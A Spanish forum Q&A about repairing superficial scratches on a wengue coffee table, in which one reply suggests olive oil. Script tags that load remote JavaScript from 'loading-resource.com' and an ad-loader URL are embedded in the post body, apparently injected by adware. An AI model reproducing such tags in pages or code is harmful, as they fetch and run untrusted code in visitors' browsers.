Como arreglar rayones de una mesa de centro es de color wengue

Tengo los muebles de color wengue ya se que es muy mala elección son lo peor no lo recomiendo, ¿pero bueno resulta que la mesa de centro me la rayaron son rayones superficiales que puedo hacer? He pensado en lijarla y volverla a pintar, en buscar alguna pegatina resistente si es que la hay, pero tengo miedo de dañarla ya que solo tiene 2 años. Agradeciendo ante mano en lo que me puedan ayudar me despido gracias :)

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

1 respuesta

Respuesta

Antes de nada, lo mejor es que en un papel de cocina, eches unas gotas de aceite de oliva y después le des en las zonas rayadas, a ver si se te soluciona.

los rayones no se han ido pero me ha quedado muy brillante, esta para comérsela :)

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>